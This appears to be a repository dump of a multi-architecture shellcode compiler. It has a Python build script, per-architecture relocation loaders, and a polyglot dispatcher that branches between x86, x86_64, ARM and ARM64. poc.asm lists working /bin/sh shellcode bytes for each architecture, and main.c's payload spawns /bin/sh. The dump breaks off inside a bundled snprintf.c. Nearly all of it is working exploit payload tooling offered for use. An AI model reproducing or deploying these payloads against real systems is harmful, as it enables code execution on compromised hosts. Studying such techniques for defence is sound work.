├── README.md ├── build.py ├── stage0 ├── README ├── init.asm └── poc.asm ├── stage1 ├── README ├── arm.s ├── arm_64.s ├── x86.s └── x86_64.s ├── stage2 ├── README ├── linuxdefs.h ├── main.c ├── snprintf.c ├── syscall_arm.c ├── syscall_arm.h ├── syscall_arm_64.c ├── syscall_arm_64.h ├── syscall_x86.c ├── syscall_x86.h ├── syscall_x86_64.c ├── syscall_x86_64.h ├── utils.c └── utils.h ├── tools ├── README ├── sc.c ├── sc_arm ├── sc_arm_64 ├── sc_x86 └── sc_x86_64 └── xarch_binsh /README.md: -------------------------------------------------------------------------------- 1 | # Cross Arch Shellcode Compiler 2 | 3 | 2016 - ixty 4 | 5 | ## Information 6 | This program allows to build portable, architecture independant shellcode from C code. 7 | It currently supports the following architectures: 8 | - x86 9 | - x86_64 10 | - arm 11 | - arm_64 12 | 13 | It works by: 14 | - compiling the same C code for each architecture 15 | - linking it to arch specific syscall implementation 16 | - using a polyglot dispatching shellcode 17 | 18 | The final layout of the output binary is: 19 | [ DISPATCHER ] 20 | [ X86 BLOCK ] 21 | [ X86_64 BLOCK ] 22 | [ ARM BLOCK ] 23 | [ ARM_64 BLOCK ] 24 | 25 | The dispatcher is in stage0 26 | Open [stage0/README](./stage0/README) for information on how it works 27 | 28 | Each arch specific block has the following layout: 29 | 30 | [ LOADER ] 31 | [ RELOC NUM ] 32 | [ RELOC 0 ] 33 | [ RELOC 1 ] 34 | ... 35 | [ RELOC N ] 36 | [ START OFF ] 37 | [ CODE ] 38 | 39 | Open [stage1/README](./stage1/README) for information on loaders 40 | 41 | The final payload code is the stage2. 42 | Open [stage2/README](./stage2/README) for information on the payload 43 | 44 | 45 | ## Dependencies 46 | 47 | - python2.7 48 | - nasm 49 | - gcc 50 | - pyelftools (pip install pyelftools) 51 | - qemu-user-static 52 | - qemu-utils 53 | - arm chroot with gcc 54 | - arm64 chroot with gcc 55 | 56 | #### Assuming you use debian: 57 | 58 | ``` 59 | # apt-get install gcc nasm python2.7 python-pip 60 | # apt-get install qemu qemu-user-static qemu-utils binfmt-support debootstrap 61 | # qemu-debootstrap --arch=arm64 jessie /opt/arm64/ http://ftp.debian.org/debian 62 | # qemu-debootstrap --arch=armhf jessie /opt/armhfxx/ http://ftp.debian.org/debian 63 | 64 | # chroot /opt/arm64 65 | # apt-get install gcc 66 | # exit 67 | 68 | # chroot /opt/armhf 69 | # apt-get install gcc 70 | # exit 71 | ``` 72 | 73 | ## Running & testing 74 | 75 | `$ ./build.py` 76 | 77 | If everything goes well, it creates ./ouput which is the portable multi-arch shellcode. 78 | 79 | To test that everything works, use the provided 'sc' utility: 80 | ``` 81 | On the local x86_64 machine 82 | user@x86_64-box $ ./sc_86 ./output 83 | user@x86_64-box $ ./sc_x86_64 ./output 84 | ... And in the chroots for arm/arm64 85 | user@armhf-chroot $ ./sc_arm ./output 86 | user@arm64-chroot $ ./sc_arm_64 ./output 87 | ``` 88 | 89 | ## Credits 90 | Thanks to feliam 91 | > https://github.com/feliam/mkShellcode 92 | 93 | > http://blog.binamuse.com/2013/01/about-shellcodes-in-c.html 94 | 95 | The x86 / x86_64 loader code is taken from this project and the shellcode extraction technique is based upon his work aswell. 96 | 97 | 98 | -------------------------------------------------------------------------------- /build.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | # 2016 - ixty 5 | # 6 | # this python program will build all stages of our code and manually 7 | # link everything together to produce a single binary blob 8 | # this blob can be ran on linux on either x86 x86_64 arm arm_64 9 | # the final payload is written in C in stage2 10 | 11 | import os, sys, struct, subprocess 12 | from elftools.elf.elffile import ELFFile 13 | 14 | # gcc compilation options that are common for all architectures 15 | # basically, we want an executable with no BS and relocation information 16 | common_opts = ' -nostdlib \ 17 | -fno-builtin \ 18 | -fno-common \ 19 | -fno-stack-protector \ 20 | -fomit-frame-pointer \ 21 | -fno-exceptions \ 22 | -fno-asynchronous-unwind-tables \ 23 | -fno-unwind-tables \ 24 | -s \ 25 | -pie \ 26 | -I./hdr ' 27 | 28 | # list of files compiled into our portable polyglot 29 | # src/syscall_(ARCH)_.c is automatically added to that list 30 | common_files = [ 31 | 'stage2/main.c', 32 | # 'stage2/snprintf.c', 33 | # 'stage2/utils.c', 34 | ] 35 | 36 | # supported architectures 37 | # with: 38 | # enabled/disabled 39 | # specific compilation flags 40 | # command to build loader 41 | # chroot to cross compile ( https://wiki.debian.org/Arm64Qemu ) 42 | # extra gcc options at the end of the cmd 43 | archs = { 44 | 'x86': { 45 | 'enabled': 1, 46 | 'opts': '-m32', 47 | 'as': [ 'as', '-32', '-o', 'stage1_bins/x86.o', 'stage1/x86.s' ], 48 | 'chroot': None, 49 | 'extra': '' 50 | }, 51 | 'x86_64': { 52 | 'enabled': 1, 53 | 'opts': '-mcmodel=large', 54 | 'as': [ 'as', '-64', '-o', 'stage1_bins/x86_64.o', 'stage1/x86_64.s' ], 55 | 'chroot': None, 56 | 'extra': '' 57 | }, 58 | 'arm': { 59 | 'enabled': 1, 60 | 'opts': '-mword-relocations', 61 | 'as': [ 'as', '-o', 'stage1_bins/arm.o', 'stage1/arm.s' ], 62 | 'chroot': '/opt/armhf/', 63 | 'extra': ' -lgcc' 64 | }, 65 | 'arm_64': { 66 | 'enabled': 1, 67 | 'opts': '-mcmodel=large', 68 | 'as': [ 'as', '-o', 'stage1_bins/arm_64.o', 'stage1/arm_64.s' ], 69 | 'chroot': '/opt/arm64/', 70 | 'extra': '' 71 | } 72 | } 73 | 74 | # globals to store bytecode, elfs, data, ... 75 | loaders = {} # stage1 76 | bins = {} # stage2 77 | payloads = {} # stage1 + stage2 78 | todelete = [] # list of directories to delete at exit 79 | 80 | # cleanup files 81 | def make_clean(): 82 | print '> cleaning up' 83 | os.system('rm -rf output stage0_bins stage1_bins stage2_bins') 84 | 85 | # assemble loaders & get their bytecode 86 | def make_loaders(): 87 | global todelete 88 | for a in sorted(archs.keys()): 89 | if not archs[a]['enabled']: 90 | continue 91 | if not archs[a]['chroot']: 92 | err, out = exec_cmd(archs[a]['as']) 93 | if err: 94 | fail('> [%-6s] error assembling loader' % a) 95 | else: 96 | path = archs[a]['chroot'] + '/tmp/cc/' 97 | os.system('mkdir -p %s' % path) 98 | os.system('cp -r ./* %s' % path) 99 | todelete += [path] 100 | 101 | if exec_chroot(archs[a]['chroot'], 'cd /tmp/cc && %s' % ' '.join(archs[a]['as'])): 102 | fail('> [%-6s] error assembling loader' % a) 103 | os.system('cp %sstage1_bins/%s.o ./stage1_bins/' % (path, a)) 104 | 105 | loaders[a] = ELFFile(file('stage1_bins/%s.o' % a)).get_section_by_name('.text').data() 106 | print '> [%-6s] loader size %d bytes' % (a, len(loaders[a])) 107 | 108 | # build elf payload 109 | def make_elfs(): 110 | for a in sorted(archs.keys()): 111 | if not archs[a]['enabled']: 112 | continue 113 | 114 | gcc_cmd = 'gcc ' + common_opts + archs[a]['opts'] + ' -o stage2_bins/%s ' % a + ' '.join(common_files) + ' stage2/syscall_%s.c' % a + archs[a]['extra'] 115 | gcc_cmd = clean_spaces(gcc_cmd) 116 | print '> [%-6s] %s' % (a, gcc_cmd) 117 | 118 | if not archs[a]['chroot']: 119 | err, out = exec_cmd(gcc_cmd.split(' ')) 120 | if err: 121 | print out 122 | fail('> [%-6s] error compiling elf' % a) 123 | else: 124 | path = archs[a]['chroot'] + '/tmp/cc/' 125 | # folder is already copied for loaders building 126 | 127 | if exec_chroot(archs[a]['chroot'], 'cd /tmp/cc && %s' % gcc_cmd): 128 | fail('> [%-6s] error compiling elf' % a) 129 | os.system('cp %sstage2_bins/%s ./stage2_bins/' % (path, a)) 130 | 131 | # for each arch, merge loader, relocs & code into a standalone arch specific 'payload' 132 | def make_payloads(): 133 | for a in sorted(archs.keys()): 134 | if not archs[a]['enabled']: 135 | continue 136 | get_payload(a) 137 | payloads[a] = loaders[a] + bins[a] 138 | with open('stage0_bins/%s' % a, 'wb+') as f: 139 | f.write(payloads[a]) 140 | 141 | # this function loads an ELF file, 142 | # extracts code, data & relocs from it 143 | # remaps sections (to prevent empty zero-pad spaces) 144 | # concatenates relocation offsets, start address & elf code/data 145 | def get_payload(a): 146 | print '> [%-6s] loading elf file' % a 147 | elf = ELFFile(file('stage2_bins/%s' % a)) 148 | secs = [] 149 | relocs = [] 150 | vaddr_min = -1 151 | vaddr_remap = 0 152 | bytebuf = '' 153 | 154 | # parse elf sections 155 | for s in elf.iter_sections(): 156 | if s.name in [ '.text', '.data', '.bss', '.rodata' ]: 157 | # add interesting sections to our list 158 | secs += [{ 159 | 'addr': s.header.sh_addr, 160 | 'name': s.name, 161 | 'data': s.data(), 162 | 'size': len(s.data()), 163 | 'remap': vaddr_remap 164 | }] 165 | # get min section vaddr 166 | if vaddr_min < 0 or s.header.sh_addr < vaddr_min: 167 | vaddr_min = s.header.sh_addr 168 | # next section remap 169 | vaddr_remap += len(s.data()) 170 | 171 | # get relocation info 172 | if 'iter_relocations' in dir(s): 173 | for r in s.iter_relocations(): 174 | # arm 64 relocs handle differently 175 | if r['r_info_type'] == 1027: 176 | relocs += [ (r['r_offset'], r['r_addend']) ] 177 | else: 178 | relocs += [ (r['r_offset'], 0) ] 179 | 180 | # list selected sections 181 | for s in secs: 182 | print ' [%-8s] addr 0x%x size 0x%x remapping to 0x%x' % (s['name'], s['addr'], s['size'], s['remap']) 183 | 184 | # patch relocs to our new mapping & add relocs to bytebuff 185 | bytebuf += pack_word(elf.elfclass, len(relocs)) 186 | for (r, addend) in relocs: 187 | addr = get_word(secs, r, elf.elfclass) # address pointed to by reloc 188 | if not addr and addend: # only happens in arm_64 for now 189 | addr = addend 190 | sec = get_section(secs, addr) # section pointed to by reloc 191 | naddr = remap_addr(secs, addr) # new address after our remapping 192 | rr = remap_addr(secs, r) # new reloc address after our remapping 193 | put_word(secs, r, elf.elfclass, naddr) 194 | # print 'reloc @ 0x%x (0x%x) in %s 0x%x (0x%x)' % (r, rr, sec['name'], addr, naddr) 195 | bytebuf += pack_word(elf.elfclass, rr) 196 | 197 | # add entry point 198 | print ' > entry point 0x%x (0x%x)' % (elf.header.e_entry, remap_addr(secs, elf.header.e_entry)) 199 | bytebuf += pack_word(elf.elfclass, remap_addr(secs, elf.header.e_entry)) 200 | 201 | # add sections data 202 | for s in secs: 203 | bytebuf += s['data'] 204 | 205 | bins[a] = bytebuf 206 | 207 | # make the final binary with the differents archs payloads 208 | def make_final(): 209 | asm = '' 210 | with open('stage0/init.asm', 'rb') as f: 211 | asm = f.read() 212 | 213 | for a in sorted(archs.keys()): 214 | if archs[a]['enabled']: 215 | pay, buf = payloads[a], 'db ' 216 | else: 217 | pay, buf = '', '' 218 | 219 | for i in range(len(pay)): 220 | buf += '0x%.2x' % ord(pay[i]) 221 | if i != len(pay) - 1: 222 | buf += ', ' 223 | 224 | asm = asm.replace('__payload_%s__' % a, buf) 225 | 226 | with open('stage0_bins/final.asm', 'wb+') as f: 227 | f.write(asm) 228 | 229 | print '> assembling final binary' 230 | err, out = exec_cmd(['nasm', '-o', 'stage0_bins/final', 'stage0_bins/final.asm']) 231 | if err: 232 | print out 233 | fail('> error assembling final binary') 234 | 235 | os.system('cp stage0_bins/final ./output') 236 | print '> saving final binary to ./output' 237 | print '> test with:' 238 | print ' ./tools/sc_x86 ./output' 239 | print ' ./tools/sc_x86_64 ./output' 240 | print ' ./tools/sc_arm ./output' 241 | print ' ./tools/sc_arm_64 ./output' 242 | 243 | # get word size & int packing format based on arch class 244 | def arch_fmt(cls): 245 | if cls == 32: 246 | size = 4 247 | fmt = ' unknown elf class' 253 | sys.exit(1) 254 | return (size, fmt) 255 | 256 | # find a section that contains specified vaddr 257 | def get_section(secs, addr): 258 | for s in secs: 259 | if addr >= s['addr'] and addr < s['addr'] + s['size']: 260 | return s 261 | return None 262 | 263 | # read word from section at specified vaddr 264 | def get_word(secs, addr, cls): 265 | size, fmt = arch_fmt(cls) 266 | b = get_bytes(secs, addr, size) 267 | return struct.unpack(fmt, b)[0] 268 | 269 | # write word from section at specified vaddr 270 | def put_word(secs, addr, cls, word): 271 | size, fmt = arch_fmt(cls) 272 | s = get_section(secs, addr) 273 | s['data'] = s['data'][0: addr - s['addr']] + struct.pack(fmt, word) + s['data'][addr - s['addr'] + size : ] 274 | 275 | # pack an int for specific arch 276 | def pack_word(cls, word): 277 | size, fmt = arch_fmt(cls) 278 | return struct.pack(fmt, word) 279 | 280 | # get bytes from vaddr 281 | def get_bytes(secs, addr, size): 282 | for s in secs: 283 | if addr >= s['addr'] and addr < s['addr'] + s['size']: 284 | return s['data'][addr - s['addr'] : addr - s['addr'] + size] 285 | return None 286 | 287 | # calculate the new vaddr after our section packing 288 | def remap_addr(secs, addr): 289 | s = get_section(secs, addr) 290 | return addr + s['remap'] - s['addr'] 291 | 292 | # abort 293 | def fail(msg): 294 | print msg 295 | sys.exit(-1) 296 | 297 | # utility to launch a cmd & get its output 298 | def exec_cmd(cmd, env=None, cwd=None): 299 | try: 300 | p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=cwd, env=env) 301 | p.wait() 302 | return (p.returncode, p.stdout.read() + p.stderr.read()) 303 | except: 304 | return (-1, '') 305 | 306 | # utility to launch a cmd in a chroot 307 | def exec_chroot(chroot, cmd, input=None): 308 | if input is not None: 309 | if subprocess.call('echo "%s" | chroot %s /bin/sh -c \'%s\'' % (input, chroot, cmd), shell=True): 310 | return -1 311 | return 0 312 | else: 313 | if subprocess.call('chroot %s /bin/sh -c \'%s\'' % (chroot, cmd), shell=True): 314 | return -1 315 | return 0 316 | 317 | # remove extra spaces 318 | def clean_spaces(s): 319 | while s.find(' ') >= 0: 320 | s = s.replace(' ', ' ') 321 | return s 322 | 323 | # main 324 | if __name__ == '__main__': 325 | arg = '' if len(sys.argv) == 1 else sys.argv[1] 326 | 327 | if arg == 'clean': 328 | make_clean() 329 | else: 330 | os.system('mkdir -p stage0_bins') 331 | os.system('mkdir -p stage1_bins') 332 | os.system('mkdir -p stage2_bins') 333 | make_loaders() 334 | make_elfs() 335 | make_payloads() 336 | make_final() 337 | # delete temp files in chroots 338 | os.system('rm -rf %s' % ' '.join(todelete)) 339 | 340 | -------------------------------------------------------------------------------- /stage0/README: -------------------------------------------------------------------------------- 1 | 2016 - ixty 2 | 3 | stage0 contains a shellcode that can be successfully executed by the following architectures: 4 | - x86 5 | - x86_64 6 | - arm (little endian) 7 | - arm_64 (aarch64) (little endian) 8 | 9 | To make it work we need: 10 | - 4 bytes that translate to: 11 | - valid opcodes for arm, arm64 and x86 12 | - that evaluate to a jump in x86 13 | - that are functional nops in both arms (aka no load / store & no touching of PC / LR / stack) 14 | - 4 more bytes that translate to: 15 | - valid opcodes for arm and arm64 16 | - evaluate to a jump in arm 17 | - functionnal nop for arm64 18 | 19 | For the x86 / arm branching we use the following: 20 | 0xEB 0xXX 0x00 0x32 (with XX being the offset to x86 code) 21 | arm andlo r0, r0, #0xeb000 22 | arm64 orr w11, w23, #7 23 | x86 jmp $+0xa / junk 24 | x86_64 jmp $+0xa / junk 25 | 26 | For the arm / arm64 branching we use: 27 | 0xXX 0xXX 0xXX 0xEA 28 | arm b XXX 29 | arm64 ands x1, x0, x0 30 | 31 | (exact decoded instructions will change based on the offset values) 32 | 33 | We differenciate between x86 32 and 64 bits by using the REX + NOP / INC trick. 34 | After that we just jump to arch specific payloads. 35 | 36 | You can use the poc.asm to get a /bin/sh shellcode compatible with all those archs (it contains nulls thought) 37 | -------------------------------------------------------------------------------- /stage0/init.asm: -------------------------------------------------------------------------------- 1 | ; 2016 - ixty 2 | ; multi-arch linux /bin/sh shellcode 3 | ; works on: 4 | ; x86 5 | ; x86_64 6 | ; arm 7 | ; arm_64 8 | ; tested on debian jessie 9 | 10 | ; compile with nasm 11 | bits 32 12 | _start: 13 | 14 | ; ======================================================================= ; 15 | ; init, polyglot shellcode for arm, arm64, x86, x86_64 16 | ; branches out to specific arch dependent payloads 17 | ; ======================================================================= ; 18 | 19 | ; arm andlo r0, r0, #0xeb000 20 | ; arm64 orr w11, w23, #7 21 | ; x86 jmp $+0xa / junk 22 | ; x86_64 jmp $+0xa / junk 23 | db 0xeb, (_x86 - $ - 2), 0x00, 0x32 24 | ; arm b _arm ($+0x10) 25 | ; arm64 ands x1, x0, x0 26 | db ((_arm - $ - 8) / 4) % 0x100, ((_arm - $ - 8) / 4) / 0x100, 0x00, 0xea 27 | ; arm64 b _arm64 ($+0x14) 28 | db ((_arm64 - $) / 4) % 0x100, ((_arm64 - $) / 4) / 0x100, 0x00, 0x14 29 | 30 | 31 | ; ======================================================================= ; 32 | ; x86 only, detect 32/64 bits 33 | ; ======================================================================= ; 34 | _x86: 35 | ; x86 xor eax, eax; 36 | ; x86_64 xor eax, eax; 37 | xor eax, eax 38 | ; x86 inc eax 39 | ; x86_64 REX + nop 40 | db 0x40 41 | nop 42 | jz _x86_64 43 | 44 | 45 | ; ======================================================================= ; 46 | ; PAYLOADs 47 | ; ======================================================================= ; 48 | _x86_32: 49 | __payload_x86__ 50 | 51 | _x86_64: 52 | __payload_x86_64__ 53 | times (4 - (($ - _start) % 4)) nop ; must be 4b aligned 54 | _arm: 55 | __payload_arm__ 56 | times (4 - (($ - _start) % 4)) nop ; must be 4b aligned 57 | _arm64: 58 | __payload_arm_64__ 59 | -------------------------------------------------------------------------------- /stage0/poc.asm: -------------------------------------------------------------------------------- 1 | ; 2016 - ixty 2 | ; multi-arch linux /bin/sh shellcode 3 | ; works on: 4 | ; x86 5 | ; x86_64 6 | ; arm 7 | ; arm_64 8 | ; tested on debian jessie 9 | 10 | ; compile with nasm 11 | bits 32 12 | _start: 13 | 14 | ; ======================================================================= ; 15 | ; init, polyglot shellcode for arm, arm64, x86, x86_64 16 | ; branches out to specific arch dependent payloads 17 | ; ======================================================================= ; 18 | 19 | ; arm andlo r0, r0, #0xeb000 20 | ; arm64 orr w11, w23, #7 21 | ; x86 jmp $+0xa / junk 22 | ; x86_64 jmp $+0xa / junk 23 | db 0xeb, (_x86 - $ - 2), 0x00, 0x32 24 | ; arm b _arm ($+0x10) 25 | ; arm64 ands x1, x0, x0 26 | db ((_arm - $ - 8) / 4), 0x00, 0x00, 0xea 27 | ; arm64 b _arm64 ($+0x14) 28 | db ((_arm64 - $) / 4), 0x00, 0x00, 0x14 29 | 30 | 31 | ; ======================================================================= ; 32 | ; x86 only, detect 32/64 bits 33 | ; ======================================================================= ; 34 | _x86: 35 | ; x86 xor eax, eax; 36 | ; x86_64 xor eax, eax; 37 | xor eax, eax 38 | ; x86 inc eax 39 | ; x86_64 REX + nop 40 | db 0x40 41 | nop 42 | jz _x86_64 43 | 44 | 45 | ; ======================================================================= ; 46 | ; PAYLOADs 47 | ; ======================================================================= ; 48 | _x86_32: 49 | ; /bin/sh shellcode 50 | db 0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x50, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80 51 | 52 | _x86_64: 53 | ; /bin/sh shellcode 54 | db 0x31, 0xc0, 0x48, 0xbb, 0xd1, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0xff, 0x48, 0xf7, 0xdb, 0x53, 0x54, 0x5f, 0x99, 0x52, 0x57, 0x54, 0x5e, 0xb0, 0x3b, 0x0f, 0x05 55 | 56 | times (4 - (($ - _start) % 4)) nop ; must be 4b aligned 57 | _arm: 58 | ; /bin/sh shellcode 59 | db 0x01, 0x30, 0x8f, 0xe2, 0x13, 0xff, 0x2f, 0xe1, 0x78, 0x46, 0x08, 0x30, 0x49, 0x1a, 0x92, 0x1a, 0x0b, 0x27, 0x01, 0xdf, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00 60 | 61 | times (4 - (($ - _start) % 4)) nop ; must be 4b aligned 62 | _arm64: 63 | ; /bin/sh shellcode 64 | db 0x00, 0x00, 0x00, 0x90, 0xa0, 0x00, 0x00, 0x10, 0x02, 0x00, 0x80, 0xd2, 0x01, 0x00, 0x80, 0xd2, 0xa8, 0x1b, 0x80, 0xd2, 0x01, 0x00, 0x00, 0xd4, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00 65 | -------------------------------------------------------------------------------- /stage1/README: -------------------------------------------------------------------------------- 1 | 2016 - ixty 2 | 3 | stage1 contains arch specific assembler code that act as 'loaders' 4 | Each loader is pretty simple, it consists of a few instructions that: 5 | - get current PC 6 | - read & patch relocation information in the binary code that follows the loader 7 | - jump to code 'entry point' 8 | 9 | Those loaders assume that the memory layout is the following: 10 | 11 | [loader code] [num relocs] [reloc1] [reloc2] ... [relocN] [start addr offset] [code] 12 | 13 | The loader assumes that the code is zero-mapped which is to say that the first instruction thinks its own address is 0 14 | The script build.py remaps the original section addresses to reflect that. 15 | -------------------------------------------------------------------------------- /stage1/arm.s: -------------------------------------------------------------------------------- 1 | # ARM Loader 2 | 3 | # getpc 4 | .section .text 5 | 6 | # ptr to reloc num into r0 7 | adrl r0, relocs 8 | # number of relocs into r1 9 | ldr r1, [r0] 10 | 11 | # begining of relocs in r2 12 | add r2, r0, #4 13 | 14 | # start addr in r3 15 | mov r5, #4 16 | mul r4, r1, r5 17 | add r4, r2, r4 18 | ldr r3, [r4] 19 | 20 | # begining of code in r4 21 | add r4, r4, #4 22 | 23 | # fix relocs loop 24 | loop: 25 | cmp r1, #0 26 | beq done 27 | 28 | # reloc addr in r0 29 | ldr r0, [r2] 30 | # reloc data ptr in r0 31 | add r0, r4, r0 32 | # data in r5 33 | ldr r5, [r0] 34 | # remap reloc 35 | add r5, r4, r5 36 | # store remapped reloc data 37 | str r5, [r0] 38 | 39 | # decrement number of relocs to process 40 | sub r1, r1, #1 41 | # go to next reloc 42 | add r2, r2, #4 43 | b loop 44 | 45 | done: 46 | add r4, r3, r4 47 | bx r4 48 | .align 4 49 | 50 | relocs: 51 | -------------------------------------------------------------------------------- /stage1/arm_64.s: -------------------------------------------------------------------------------- 1 | # ARM64 Loader 2 | 3 | # getpc 4 | .section .text 5 | 6 | # ptr to reloc num into x0 7 | adr x0, relocs 8 | # number of relocs into x1 9 | ldr x1, [x0] 10 | 11 | # begining of relocs in x2 12 | add x2, x0, #8 13 | 14 | # start addr in x3 15 | mov x5, #8 16 | mul x4, x1, x5 17 | add x4, x2, x4 18 | ldr x3, [x4] 19 | 20 | # begining of code in x4 21 | add x4, x4, #8 22 | 23 | # fix relocs loop 24 | loop: 25 | cmp x1, #0 26 | beq done 27 | 28 | # reloc addr in x0 29 | ldr x0, [x2] 30 | # reloc data ptr in x0 31 | add x0, x4, x0 32 | # data in x5 33 | ldr x5, [x0] 34 | # remap reloc 35 | add x5, x4, x5 36 | # store remapped reloc data 37 | str x5, [x0] 38 | 39 | # decrement number of relocs to process 40 | sub x1, x1, #1 41 | # go to next reloc 42 | add x2, x2, #8 43 | b loop 44 | 45 | done: 46 | add x4, x3, x4 47 | br x4 48 | .align 4 49 | 50 | relocs: 51 | -------------------------------------------------------------------------------- /stage1/x86.s: -------------------------------------------------------------------------------- 1 | # x86 Loader 2 | 3 | # getpc 4 | .section .text 5 | jmp getpc1 6 | getpc2: 7 | jmp begin 8 | getpc1: 9 | call getpc2 10 | 11 | # loader code 12 | begin: 13 | popl %esi 14 | subl $(begin-relocs), %esi 15 | 16 | # esi now relocs 17 | movl (%esi), %ecx # get num relocs 18 | leal 8(%esi,%ecx,4), %edi # start of code 19 | andl %ecx, %ecx 20 | jz done 21 | 22 | # fix relocs loop 23 | fix_reloc: 24 | movl (%esi,%ecx,4), %eax 25 | addl %edi, (%edi,%eax,1) 26 | dec %ecx 27 | jne fix_reloc 28 | 29 | # start shellcode now 30 | done: 31 | addl -4(%edi), %edi 32 | jmp *%edi 33 | 34 | .align 4 35 | 36 | relocs: 37 | # [num_relocs 4b] [relocs 4b * N] [start 4b] [code xB] 38 | -------------------------------------------------------------------------------- /stage1/x86_64.s: -------------------------------------------------------------------------------- 1 | # x86_64 Loader 2 | 3 | # getpc 4 | .section .text 5 | jmp getpc1 6 | getpc2: 7 | jmp begin 8 | getpc1: 9 | call getpc2 10 | 11 | # loader code 12 | begin: 13 | popq %rsi 14 | subq $(begin-relocs), %rsi 15 | 16 | # esi now relocs 17 | movq (%rsi), %rcx # get num relocs 18 | leaq 16(%rsi,%rcx,8), %rdi # start of code 19 | andq %rcx, %rcx 20 | jz done 21 | 22 | # fix relocs loop 23 | fix_reloc: 24 | movq (%rsi,%rcx,8), %rax 25 | addq %rdi, (%rdi,%rax,1) 26 | dec %rcx 27 | jne fix_reloc 28 | 29 | # start shellcode now 30 | done: 31 | addq -8(%rdi), %rdi 32 | jmpq *%rdi 33 | 34 | .align 8 35 | 36 | relocs: 37 | # [num_relocs 4b] [relocs 4b * N] [start 4b] [code xB] 38 | -------------------------------------------------------------------------------- /stage2/README: -------------------------------------------------------------------------------- 1 | 2016 - ixty 2 | 3 | stage2 is the final payload code. 4 | It is written in C once and will be compiled for all supported architectures. 5 | 6 | The architecture specific code is in the syscall_*.c/h files that implement linux syscalls. 7 | 8 | Dont forget to edit build.py if you add more c files to be compiled. 9 | 10 | 11 | -------------------------------------------------------------------------------- /stage2/linuxdefs.h: -------------------------------------------------------------------------------- 1 | #ifndef _SYMB_LINUX_DEFS_H 2 | #define _SYMB_LINUX_DEFS_H 3 | 4 | #include 5 | #include 6 | 7 | #define ssize_t long 8 | #define size_t unsigned long 9 | 10 | #define O_RDONLY 00 11 | #define O_WRONLY 01 12 | #define O_RDWR 02 13 | #define O_CREAT 0100 14 | #define O_TRUNC 01000 15 | #define O_APPEND 02000 16 | 17 | 18 | #define F_DUPFD 0 19 | #define F_GETFD 1 20 | #define F_SETFD 2 21 | #define F_GETFL 3 22 | #define F_SETFL 4 23 | 24 | 25 | #define SEEK_SET 0 26 | #define SEEK_CUR 1 27 | #define SEEK_END 2 28 | 29 | 30 | #define PROT_READ 0x1 31 | #define PROT_WRITE 0x2 32 | #define PROT_EXEC 0x4 33 | #define PROT_NONE 0x0 34 | #define MAP_SHARED 0x01 35 | #define MAP_PRIVATE 0x02 36 | #define MAP_TYPE 0x0f 37 | #define MAP_FIXED 0x10 38 | #define MAP_ANONYMOUS 0x20 39 | 40 | #endif 41 | -------------------------------------------------------------------------------- /stage2/main.c: -------------------------------------------------------------------------------- 1 | // #include "utils.h" 2 | 3 | void _start() 4 | { 5 | // simple /bin/sh shellcode 6 | _execve("/bin/sh", NULL, NULL); 7 | 8 | // // test a few of the syscalls 9 | // printf("> _start @ 0x%llx\n", _start); 10 | // void * mem = _mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 11 | // printf("> hello, mem @ 0x%llx\n", mem); 12 | // *(int*)mem = 1; 13 | // _exit(3); 14 | } 15 | -------------------------------------------------------------------------------- /stage2/snprintf.c: -------------------------------------------------------------------------------- 1 | /**************************************************************************** 2 | 3 | Copyright (c) 1999,2000 WU-FTPD Development Group. 4 | All rights reserved. 5 | 6 | Portions Copyright (c) 1980, 1985, 1988, 1989, 1990, 1991, 1993, 1994 7 | The Regents of the University of California. 8 | Portions Copyright (c) 1993, 1994 Washington University in Saint Louis. 9 | Portions Copyright (c) 1996, 1998 Berkeley Software Design, Inc. 10 | Portions Copyright (c) 1989 Massachusetts Institute of Technology. 11 | Portions Copyright (c) 1998 Sendmail, Inc. 12 | Portions Copyright (c) 1983, 1995, 1996, 1997 Eric P. Allman. 13 | Portions Copyright (c) 1997 by Stan Barber. 14 | Portions Copyright (c) 1997 by Kent Landfield. 15 | Portions Copyright (c) 1991, 1992, 1993, 1994, 1995, 1996, 1997 16 | Free Software Foundation, Inc. 17 | 18 | Use and distribution of this software and its source code are governed 19 | by the terms and conditions of the WU-FTPD Software License ("LICENSE"). 20 | 21 | If you did not receive a copy of the license, it may be obtained online 22 | at http://www.wu-ftpd.org/license.html. 23 | 24 | $Id: snprintf.c,v 1.1 2001/07/06 19:23:39 scut Exp $ 25 | 26 | ****************************************************************************/ 27 | 28 | #ifndef __P 29 | #define __P(p) p 30 | #endif 31 | 32 | #include 33 | #define VA_LOCAL_DECL va_list ap; 34 | #define VA_START(f) va_start(ap, f) 35 | #define VA_END va_end(ap) 36 | 37 | #ifdef SOLARIS2 38 | #ifdef _FILE_OFFSET_BITS 39 | #define SOLARIS26 40 | #endif 41 | #endif 42 | 43 | #ifdef SOLARIS26 44 | #define HAS_SNPRINTF 45 | #define HAS_VSNPRINTF 46 | #endif 47 | #ifdef _SCO_DS_ 48 | #define HAS_SNPRINTF 49 | #endif 50 | #ifdef luna2 51 | #define HAS_VSNPRINTF 52 | #endif 53 | /* 54 | ** SNPRINTF, VSNPRINT -- counted versions of printf 55 | ** 56 | ** These versions have been grabbed off the net. They have been 57 | ** cleaned up to compile properly and support for .precision and 58 | ** %lx has been added. 59 | */ 60 | 61 | /************************************************************** 62 | * Original: 63 | * Patrick Powell Tue Apr 11 09:48:21 PDT 1995 64 | * A bombproof version of doprnt (dopr) included. 65 | * Sigh. This sort of thing is always nasty do deal with. Note that 66 | * the version here does not include floating point... 67 | * 68 | * snprintf() is used instead of sprintf() as it does limit checks 69 | * for string length. This covers a nasty loophole. 70 | * 71 | * The other functions are there to prevent NULL pointers from 72 | * causing nast effects. 73 | **************************************************************/ 74 | 75 | /*static char _id[] = "$Id: snprintf.c,v 1.1 2001/07/06 19:23:39 scut Exp $"; */ 76 | static void dopr(char *, const char *, va_list); 77 | static char *end; 78 | 79 | #ifndef HAS_VSNPRINTF 80 | int 